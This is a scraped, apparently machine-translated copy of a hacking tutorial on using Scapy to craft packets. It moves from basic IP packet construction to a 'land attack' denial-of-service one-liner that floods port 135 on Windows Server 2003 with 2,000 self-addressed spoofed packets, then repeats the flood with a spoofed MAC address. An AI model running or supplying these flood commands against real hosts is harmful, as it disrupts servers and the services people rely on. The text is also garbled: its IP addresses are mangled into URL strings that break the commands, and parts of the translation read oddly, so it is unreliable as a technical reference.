قالب وردپرس درنا توس
Home / Tips and Tricks / How to Create New Scanning and Execution Packages with Scapy «Null Byte :: WonderHowTo

How to Create New Scanning and Execution Packages with Scapy «Null Byte :: WonderHowTo



Using almost all package-building tools, a hacker can perform Denial-of-Service (DoS) attacks. With the ability to create nearly any package with or features, a hacker can easily find a package that fails a host or network. Nmap and Hping are effective package manipulation tools, but there is also Scapy, which is almost infinitely customizable.

The ability to customize a package is exactly where Scapy shines with Nmap and Hping. This does not mean that Nmap and Hping are not customizable, but their adaptability is limited, which challenges usability for customization. On the other hand, the ability of Scapy to adapt it is almost limitless, but there is a certain learning curve.

Understanding TCP / IP

When using a tool such as Scapy, Nmap, and Hping, it is important to understand the structure of both the IP header and the TCP header. Without this basic knowledge of these protocols, it would be like trying to fly an F-16 into a war zone without basic flight training. It's a powerful weapon, and you could drop one or two bombs, but you're probably going to crash and burn.

You should also be familiar with the TCP header and the TCP packet:

Step 1: Start Scapy

Start Scapy immediately with scapy in a new terminal window. We will use Kali Linux for this manual, which has Scapy installed by default, but it should be similar for other Linux distributions.

  ~ # scapy

INFO: PyX can not be imported. Can not use psdump () or pdfdump ().
WARNING: IPython is not available. Use the default Python shell instead.
AutoComplete, History are disabled.

aSPY // YASa
apyyyyCY ////////// YCa |
sY ////// YSpcs scpCY // Pp | Welcome to Scapy
ayp ayyyyyyyCP // Pp syY // C | Version 2.4.0
AYAsAYYYYYYYY /// Ps cY // S |
pCCCCY // p cSSps y // Y | https://github.com/secdev/scapy
SPPPP /// a pP /// AC // Y |
A // A cyP //// C | Have fun!
p /// Ac sC /// a |
P //// YCpc A // A | Bastelpakete as I make my beer.
scccccp /// pSP /// p p // Y | - Jean De Clerck
sY ////////// y ca S // P |
cayCyayP // Ya pY / Ya
sY / PsY //// YCc aC // Yp
sc sccaCY // PCypaapyCP // YSs
spCPY ////// YPSps
ccaacs

>>> 

Notice the prompt >>> after the tool's information is displayed. It indicates that Scapy is in interactive mode. All commands thereafter are Scapy commands and are interpreted by the Scapy interpreter.

If you do not see the above instructions because you did not install the tool, you can use pip install scapy . get it. There are also newer development versions that you can test if you want.

  ~ # pip install scapy 

Step 2: Creating a Package

The beauty of Scapy is the ability to customize every conceivable package. In general, the TCP / IP stack of your operating system creates an RFC compliant package if you want to communicate over the Internet.

As a hacker, we often want to create a unique package that may not be ] to be RFC compliant to collect information about a destination (such as scanning). In addition, a DoS condition can be created by creating a package that crashes the target system (eg, land attack, ping-of-death, fragroute, etc.).

Let's start by creating a simple IP package. In Scapy, first declare a variable that represents your package, and then define the package attributes one at a time. In my example we define the package as "x" and then give it several attributes. Define "x" as an IP packet with a TTL of 64.

  >>> x = IP (ttl = 64)
>>> x

 

After I created the variable x and defined it as an IP package with a TTL of 64, I typed in the variable x again and replied with the value x. In this case, the IP lifetime equals 64.

Now add some additional attributes to this variable x, eg. For example, a source and a destination IP address. The syntax is similar to Wireshark or Tcpdump. We represent the source IP attribute with x.src followed by the value in double quotes ( ").) In my example, I use 192.168.1.101 as the source IP address .

  >>> x.src = "http://null-byte.wonderhowto.com/192.168.1.101"
>>> x

 

Then we represent the destination IP attribute with x.dst followed by the value in double quotes ( ").) In my example, I use 192.168. 1,122 as the destination IP address.

  >>> x.dst = "http://null-byte.wonderhowto.com/192.168.1.122"
>>> x

 

Note that after setting each value, I checked the value by simply reentering the variable followed by the attribute. At this time, we have created a package with the following attributes:

  • TTL = 64
  • Source IP address is 192.168.1.101
  • Destination IP address is 192.168.1.122

You can verify this by typing the variable name x again. Scapy returns the variable with the attributes listed correctly.

  >>> x

Step 3: Viewing built-in functions

Scapy has a large number of built-in functions that can be listed with the command lsc () . Note the command send in the list that is used when sending a packet.

  >>> lsc ()

IPID_count: Identify IP ID value classes in a list of packages
arpcachepoison: Poison the cache of the target with a pair (MAC, IP of the victim)
arping: Sends ARP requests to determine which hosts are active
bind_layers: Binds 2 levels to the values ​​of some specific fields
bridge_and_sniff: forward traffic between the interfaces if1 and if2, sniff and return
chexdump: Creates a hexadecimal representation per byte
computeNIGroupAddr: Calculates the NI group address. Can use a fully qualified domain name as an input parameter
corrupt_bits: Tilt a specific percentage or number of bits from a string
corrupt_bytes: Damages a certain percentage or number of bytes from a string
defrag: defrag (plist) -> ([not fragmented][defragmented])
defragment: defrag (plist) -> plist as far as possible defragmented
dhcp_request: -
dyndns_add: Send a DNS add message to a name server for "name" to get new "rdata"
dyndns_del: Send a DNS delete message to a nameserver for "name"
Aether Leak: Exploit aether leak error
fletcher16_checkbytes: Calculates the Fletcher 16 checkbytes returned as a 2-byte binary string.
fletcher16_checksum: Computes the Fletcher 16 checksum of the specified buffer.
fragleak: -
fragleak2: -
fragment: Fragment a large IP datagram
Fuzz: Turn a layer into a fuzzy layer by replacing some defaults with random objects
getmacbyip: Returns the MAC address corresponding to a specific IP address
getmacbyip6: Returns the MAC address corresponding to an IPv6 address
hexdiff: show differences between 2 binary strings
Hexadecimal Dump: Create a tcpdump as a hexadecimal view
hexedit: -
hex: -
import_hexcap: -
is_promisc: Try to guess if the target is in Promisc mode. The goal is provided by its IP.
linehexdump: Creates an equivalent view of hexdump () on a single line
ls: Lists available levels or information about a specific layer class or name
neighsol: Sends an ICMPv6 Neighbor Solicitation message to get the MAC address of the neighbor with the specified IPv6 address
overlap_frag: creates overlapping fragments to bypass NIPS
Promiscping: Send ARP user requests to determine which hosts are in promiscuous mode
rdpcap: Reads a pcap or pcapng file and returns a package list
report_ports: scans a target and outputs a LaTeX table
restart: Restarts the therapy
send: Send packets to Layer 3
sendp: send packets on layer 2
sendpfast: Send packets on Layer 2 with tcpreplay to improve performance
sniff:
split_layers: Splits 2 previously bound layers
sr: sending and receiving packets on layer 3
sr1: Send packets on layer 3 and return only the first answer
sr1flood: Floods and receives packets on layer 3 and returns only the first answer
srbt: Sending and receiving via a Bluetooth socket
srbt1: Send and receive 1 packet via a Bluetooth socket
srflood: Floods and receives packets on layer 3
srloop: Send a packet on layer 3 in the loop and print out the answer every time
srp: Send and receive packets on layer 2
srp1: Send and receive packets on layer 2 and return only the first answer
srp1flood: Floods and receives packets on layer 2 and returns only the first response
srpflood: Floods and receives packets on layer 2
srploop: Loop a packet on Layer 2 and print out the response every time
tcpdump: Run tcpdump or tshark on a list of packages
Traceroute: Immediate TCP trace route
traceroute6: Immediate TCP Traceroute with IPv6
traceroute_map: Use this feature to call traceroute on multiple destinations
tshark: Sniff packages and print them with pkt.summary (), a bit like text wireshark
wireshark: Execute wireshark on a list of packages
wrpcap: Write a list of packages in a pcap file. 

Use send to send the package "x" created above with the attributes TTL = 64 and the source IP address 192.168. 1,101 and a destination IP address of 192.168.1.122. Of course, the packet is sent to the destination IP address when sending and has a limit of 64 hops (TTL = 64).

  >>> send (x)

,
1 packets sent. 

As you can see, our specially crafted "x" package was sent to the destination IP address. With Scapy, you can create a package with just about any value in any of the IP Header or TCP Header fields, such as: Window size, flags, fragmentation field, confirmation value, sequence number, etc.

Step 4: Create a Attack

I hope you now come up with the idea that Scapy manipulates of all fields in TCP / IP package can be used. Now you can use this feature to create a malicious package and send it to a target system.

Windows Server 2003 (believe it or not, there are still millions of 2003 servers): Enable Netcraft, or use Xprobe2 to determine this The operating system is vulnerable to the "land" Attack, a DoS attack that sends an oversized packet to the destination with the same source and destination IP address as well as the same source and destination ports. The system does not always crash, but slows it down considerably. For web servers, slowing down is effectively a DoS.

To create a land attack package, Scapy can take over all attributes in a single command. So use the following format to create the Land attack package and send it 2,000 times. In this one-liners send is the command; IP defines the protocol for IP addresses. src = "http://null-byte.wonderhowto.com/192.168.1.122" is the source IP address. dst = "http://null-byte.wonderhowto.com/192.168.1.122" is the destination IP address. TCP defines the protocol for the ports. sport = 135 defines the source port, dport = 135 defines the destination port; and count = 2000 defines the number of packets to send.

  >>> send (IP (src = "http://null-byte.wonderhowto.com/192.168.1.122", dst = "http://null-byte.wonderhowto.com/192.168.1.122") / TCP (sport = 135, dport = 135), count = 2000)

.................................................. ..........................................
.................................................. ..........................................
.................................................. ..........................................
.................................................. ..........................................
.................................................. ..........................................
.................................................. ..........................................
.................................................. ..........................................
.................................................. ..........................................
.................................................. ..........................................
.................................................. ..........................................
.................................................. ..........................................
.................................................. ..........................................
.................................................. ..........................................
.................................................. ..........................................
.................................................. ..........................................
.................................................. ..........................................
.................................................. ..........................................
.................................................. ..........................................
.................................................. ..........................................
.................................................. ..........................................
.................................................. ..........................................
.................................................. ..................
Sent 2000 packages. 

Sending these packages to Windows Server 2003 may cause the system to crash or at least dramatically slow it down. When a web server slows down, the site is effectively blocked.

Step 5: Spoofing the MAC Address

The only problem we've seen above is that we compromised our MAC address. I'm sure I do not have to tell you why this should be a problem, but a MAC address can tell the manufacturer of your device and reveal the fact that you are not who you say you are.

The function send sends packets to layer 3 so that it does the routing and layer 2 for you. However, sendp works at level 2. Thanks to zero-byte user Triphat suggested the following command using the latter function.

Same steps as in step 4, but with spoofing your MAC address sendp is the command; Ether indicates that it is an Ethernet layer (so it is only a LAN). src = "http://null-byte.wonderhowto.com/aa:bb:cc:dd:ee:ff" is the value of the fake source MAC address. IP defines the protocol for IP addresses. src = "http://null-byte.wonderhowto.com/192.168.1.122" is the source IP address. dst = "http://null-byte.wonderhowto.com/192.168.1.122" is the destination IP address. TCP defines the protocol for the ports. sport = 135 defines the source port, dport = 135 defines the destination port; and count = 2000 defines the number of packets to send.

  >>> sendp (Ether (src = "http://null-byte.wonderhowto.com/aa:bb:cc:dd: ee: ff") / IP (src = "http: // null- byte.wonderhowto.com/192.168.1.122 ", dst =" http://null-byte.wonderhowto.com/192.168.1.122 ") / TCP (sport = 135, dport = 135), count = 2000)

.................................................. .................................................. .......................
.................................................. .................................................. .......................
.................................................. .................................................. .......................
.................................................. .................................................. .......................
.................................................. .................................................. .......................
.................................................. .................................................. .......................
.................................................. .................................................. .......................
.................................................. .................................................. .......................
.................................................. .................................................. .......................
.................................................. .................................................. .......................
.................................................. .................................................. .......................
.................................................. .................................................. .......................
.................................................. .................................................. .......................
.................................................. .................................................. .......................
.................................................. .................................................. .......................
.................................................. .................................................. .......................
................................
Sent 2000 packages. 

To see what this looks like from the target, watch the video above to see the packages captured in Wireshark and their looks.

Scapy is another robust scanning and DoSing tool in a hacker's arsenal. It's incredibly versatile, so you can perform multiple tasks with a single tool. It is virtually unlimited in its ability to create packages with all imaginable features, creating a unique scanning technique and DoS attacks.

Do not Miss: The Guide for Everyone to Forward Network Packages via the Web [19659053] Cover Picture on Shutterstock; Screenshots of OTW / Null Byte


Source link